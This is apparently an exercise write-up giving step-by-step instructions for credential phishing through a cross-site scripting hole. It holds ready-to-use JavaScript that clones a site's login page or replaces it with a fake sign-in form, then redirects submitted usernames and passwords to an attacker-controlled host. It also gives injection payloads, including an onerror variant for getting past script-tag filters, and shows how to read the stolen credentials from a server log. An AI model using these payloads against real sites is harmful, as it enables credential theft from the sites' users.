Hosting method (change "login" in the fetch() call to the target's real login path, e.g. /auth):

  1. First create a file named phish.js with the following content. It fetches the real login page so the phishing page is an exact copy, then repoints the form at the attacker host and switches it to GET, so the submitted credentials end up in the query string where a plain HTTP server log shows them:
    fetch("login")                      // relative path of the target's login page, e.g. "/auth"
      .then(res => res.text())
      .then(data => {
        document.getElementsByTagName("html")[0].innerHTML = data
        const form = document.getElementsByTagName("form")[0]
        form.action = "http://domain/phish"   // attacker host that collects the credentials
        form.method = "get"                   // GET: username/password appear in the request line
      })
    
  2. Host the file from the directory containing phish.js (port 80 needs root): python3 -m http.server 80. Because the form now submits with GET, each victim's credentials show up in this server's access log as the query string of a GET /phish request (the 404 it returns does not matter).

  3. Inject the payload into the XSS-vulnerable field (ownIP is the host running the HTTP server from step 2): <script src="http://ownIP/phish.js"></script>

  4. If <script> tags are filtered, load the same file from an event handler instead: <img src="x" onerror="document.head.appendChild(Object.assign(document.createElement('script'), {src: 'http://domain/phish.js'}))">

Alternative Exercise Solution

  1. Create a file phishexercise.js that replaces the whole page with a fake login form (the form submits with GET, so username and password reach the attacker host in the query string):
    document.getElementsByTagName("html")[0].innerHTML = `
      <form action='http://domain/login' method='GET'>
        <input type='text' placeholder='name@example.com' name='username'>
        <input type='password' placeholder='Password' name='password'>
        <button class='w-100 btn btn-lg btn-primary' type='submit'>Sign in</button>
      </form>`
    
  2. Insert this into the XSS-vulnerable field (the filename must match the file you host in step 1):
    <img src='x' onerror="var s = document.createElement('script'); s.src = 'http://domain/phishexercise.js'; s.async = true; document.body.appendChild(s);">